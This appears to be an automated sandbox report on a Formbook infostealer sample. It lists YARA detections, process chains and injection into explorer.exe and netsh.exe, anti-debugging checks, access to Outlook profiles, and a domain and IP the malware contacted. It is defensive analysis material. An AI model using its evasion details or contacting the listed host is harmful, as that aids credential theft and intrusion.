Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00406333 0_2_00406333
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00404936 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B2A9AA 1_2_00B2A9AA
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B134E0 1_2_00B134E0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1C4C0 1_2_00B1C4C0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B18E70 1_2_00B18E70
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004012B0 2_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0042193D 2_2_0042193D
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00421284 2_2_00421284
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004012A4 2_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040B453 2_2_0040B453
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040B457 2_2_0040B457
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00422429 2_2_00422429
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004044C7 2_2_004044C7
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004044BE 2_2_004044BE
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004046E7 2_2_004046E7
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040FE87 2_2_0040FE87
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B2A9AA 2_2_00B2A9AA
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B134E0 2_2_00B134E0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B1C4C0 2_2_00B1C4C0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B18E70 2_2_00B18E70
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: String function: 00B1D900 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: String function: 00B22574 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041E087 NtAllocateVirtualMemory, 2_2_0041E087
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004012B0 EntryPoint,NtProtectVirtualMemory, 2_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DEA7 NtCreateFile, 2_2_0041DEA7
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DF57 NtReadFile, 2_2_0041DF57
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DFD7 NtClose, 2_2_0041DFD7
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041E081 NtAllocateVirtualMemory, 2_2_0041E081
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004012A4 EntryPoint,NtProtectVirtualMemory, 2_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004014E9 NtProtectVirtualMemory, 2_2_004014E9
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DF52 NtReadFile, 2_2_0041DF52
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041DFD2 NtClose, 2_2_0041DFD2
Source: qHpeBvr9cR.exe ReversingLabs: Detection: 41%
Source: qHpeBvr9cR.exe Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe File read: C:\Users\user\Desktop\qHpeBvr9cR.exe
Source: qHpeBvr9cR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\qHpeBvr9cR.exe C:\Users\user\Desktop\qHpeBvr9cR.exe
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe File created: C:\Users\user\AppData\Local\Temp\nsx95CB.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@7/4
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar, 0_2_00402036
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043F5
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --headless 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --unix 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --width 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --height 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --signal 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --server 1_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --headless 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --unix 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --width 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --height 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --signal 2_2_00B118D0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Command line argument: --server 2_2_00B118D0
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\netsh.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25A15 push ecx; ret 1_2_00B25A28
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004210E9 push eax; ret 2_2_004210EF
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_004210F2 push eax; ret 2_2_00421159
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0042109C push eax; ret 2_2_004210EF
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00421153 push eax; ret 2_2_00421159
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040EAA3 push ecx; retf 2_2_0040EAA6
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041E5D0 push ecx; iretd 2_2_0041E5D2
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00419F38 push edx; ret 2_2_00419F39
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0041FF93 push ebx; retf 2_2_0041FF94
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25A15 push ecx; ret 2_2_00B25A28
Source: febcldoukq.exe.0.dr Static PE information: section name: .00cfg
Source: febcldoukq.exe.0.dr Static PE information: section name: .voltbl
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe File created: C:\Users\user\AppData\Local\Temp\febcldoukq.exe
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe API coverage: 2.2 %
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe API coverage: 2.6 %
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25293 FindFirstFileExW, 1_2_00B25293
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00B25347
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25293 FindFirstFileExW, 2_2_00B25293
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00B25347
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.338206694.00000000043B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.366190197.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.365808635.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00B237DA
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B2258B GetProcessHeap, 1_2_00B2258B
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B2009E mov ecx, dword ptr fs:[00000030h] 1_2_00B2009E
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B2418D mov eax, dword ptr fs:[00000030h] 1_2_00B2418D
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B2009E mov ecx, dword ptr fs:[00000030h] 2_2_00B2009E
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B2418D mov eax, dword ptr fs:[00000030h] 2_2_00B2418D
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_0040C317 LdrLoadDll, 2_2_0040C317
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1D720 SetUnhandledExceptionFilter, 1_2_00B1D720
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00B1DC2D
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00B237DA
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00B1D72C
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B1DC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00B1DC2D
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B237DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00B237DA
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B1D720 SetUnhandledExceptionFilter, 2_2_00B1D720
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B1D72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00B1D72C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe Network Connect: 155.159.61.221 80
